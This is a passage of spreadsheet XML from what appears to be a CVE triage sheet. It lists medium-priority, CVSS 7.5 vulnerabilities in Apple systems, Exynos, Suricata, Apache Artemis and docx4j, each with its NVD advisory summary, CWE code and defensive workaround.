      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27557</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr"/>
      <c r="Q584" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can exploit a path traversal vulnerability in the /index.php/view_uploaded_iodd_file endpoint allowing the SSH server's private keys to be read.</t>
        </is>
      </c>
      <c r="S584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27557</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28935</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr"/>
      <c r="Q585" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in iOS 26.6.1 and iPadOS 26.6.1, macOS Sequoia 15.8, macOS Tahoe 26.6.2, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28935</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28938</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr"/>
      <c r="Q586" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>A privacy issue was addressed by moving sensitive data. This issue is fixed in iOS 26.6 and iPadOS 26.6. An app may be able to fingerprint the user.</t>
        </is>
      </c>
      <c r="S586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28938</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33963</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr"/>
      <c r="Q587" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in camera in Samsung Mobile Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500, 2600, and 1680. A stack-based buffer overflow occurs when a malformed message is sent to the camera driver, causing a denial of service.</t>
        </is>
      </c>
      <c r="S587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33963</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43789</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr"/>
      <c r="Q588" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access user-sensitive data.</t>
        </is>
      </c>
      <c r="S588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43789</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45759</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr"/>
      <c r="Q589" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata could repeatedly perform expensive parsing of large HTTP `Content-Disposition` headers during HTTP response body processing. Crafted HTTP traffic could cause excessive CPU usage and denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, use a rule like `alert http1 any any -&gt; any any (sid: 1; http.request_header; content: "Content-Disposition:"; startswith; bsize: &gt; 8192; bypass;)`.</t>
        </is>
      </c>
      <c r="S589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45759</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45765</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr"/>
      <c r="Q590" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, DNP3 reassembly could buffer data without sufficient parser-level bounds. Crafted DNP3 traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable DNP3 (which is not enabled by default) if it is not needed, and/or define a limited `stream.reassembly.depth` (0 or absent is unlimited).</t>
        </is>
      </c>
      <c r="S590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45765</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45766</t>
        </is>
      </c>
      <c r="D591" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr"/>
      <c r="Q591" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R591" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, certain NFS parser state structures were insufficiently bounded. Crafted NFS traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable NFS application-layer parsing if it is not needed.</t>
        </is>
      </c>
      <c r="S591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45766</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45768</t>
        </is>
      </c>
      <c r="D592" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F592" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr"/>
      <c r="Q592" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R592" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, LDAP transaction state could store an unbounded number of responses. Because LDAP can be processed over UDP, crafted traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Version 8.0.5 contains a fix. As a workaround, disable LDAP application-layer parsing where it is not required. Alternatively, use a rule like `alert ldap any any -&gt; any any (sid: 1; ldap.responses.count: &gt;1024; bypass;)`.</t>
        </is>
      </c>
      <c r="S592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45768</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45769</t>
        </is>
      </c>
      <c r="D593" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F593" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr"/>
      <c r="Q593" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R593" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5,IKEv2 parser state could grow without bounds while storing client transforms. Repeated crafted UDP traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 fix the issue. Some workarounds are available. Disable IKE application-layer parsing if it is not needed. Alternatively, use a rule to bypass ike flows after the first packets like `alert ike any any -&gt; any any (sid: 2; flow.pkts_toserver: &gt; 256; bypass; noalert;)`.</t>
        </is>
      </c>
      <c r="S593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45769</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45770</t>
        </is>
      </c>
      <c r="D594" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr"/>
      <c r="Q594" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="R594" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, a Lua rule that registers too many flow variables can corrupt Lua detection state and may bypass Suricata's restricted Lua sandbox. This requires an affected Lua script/rule to be loaded. Excessive flow variables being registered may also cause Suricata to crash. Version 8.0.5 contains a fix. As a workaround, disable `security.lua.allow-rules` unless Lua rules are required.</t>
        </is>
      </c>
      <c r="S594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45770</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46352</t>
        </is>
      </c>
      <c r="D595" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="inlineStr"/>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr"/>
      <c r="Q595" s="5" t="inlineStr">
        <is>
          <t>CWE-833</t>
        </is>
      </c>
      <c r="R595" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, Suricata's IP defragmentation code could deadlock when processing fragmented traffic containing an encapsulated tunnel protocol whose payload is itself fragmented. Version 8.0.5 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46352</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49362</t>
        </is>
      </c>
      <c r="D596" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr"/>
      <c r="Q596" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R596" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can create arbitrary durable queues via the CORE protocol, leading to unauthorized broker state manipulation and potential denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49362</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49363</t>
        </is>
      </c>
      <c r="D597" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr"/>
      <c r="Q597" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R597" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker connecting with the CORE protocol can discover cluster node details by sending a SUBSCRIBE_TOPOLOGY request prior to authentication.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49363</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53752</t>
        </is>
      </c>
      <c r="D598" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr"/>
      <c r="Q598" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-770</t>
        </is>
      </c>
      <c r="R598" s="5" t="inlineStr">
        <is>
          <t>docx4j is an open source Java library for creating, editing, and saving OpenXML packages, including DOCX, PPTX, and XLSX files. Prior to 11.5.14, PropertyResolver and adjacent helpers recursively follow the WordprocessingML w:basedOn style inheritance chain without cycle detection. A well-formed DOCX containing mutually based styles causes unbounded recursion in PropertyResolver.fillPPrStack and related effective-style resolution paths, resulting in StackOverflowError. Server-side conversion and table-of-contents processing of an untrusted document can terminate a worker thread, degrade a thread pool, or deny service, although isolation in disposable workers or safe containment of StackOverflowError can reduce the practical effect. The fix adds cyclic-style tracking and CyclicStylesException handling. This issue is fixed in version 11.5.14.</t>
        </is>
      </c>
      <c r="S598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53752</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54567</t>
        </is>
      </c>
      <c r="D599" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr"/>
      <c r="Q599" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-434</t>
        </is>
      </c>
      <c r="R599" s="5" t="inlineStr">
        <is>
